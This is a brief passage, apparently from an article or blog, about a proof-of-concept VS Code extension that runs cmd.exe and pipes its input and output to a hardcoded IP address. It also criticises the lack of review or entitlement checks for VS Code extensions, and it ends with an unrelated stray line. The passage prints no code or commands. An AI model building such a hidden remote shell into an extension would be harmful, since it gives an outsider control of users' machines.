True, it’s a private (not local) IP. It could easily have connected to a remote system, as their proof-of-concept did.
This code execs cmd.exe
and pipes output to and from a hardcoded IP. That’s pretty weird. What’s running on that IP? How does the extension know something is there?
It looks like VS Code has no review — human or automated — or enforced entitlement system that would have stopped this or at least had someone verify it was legit.
The one that’s not shown: Standalone Passwords app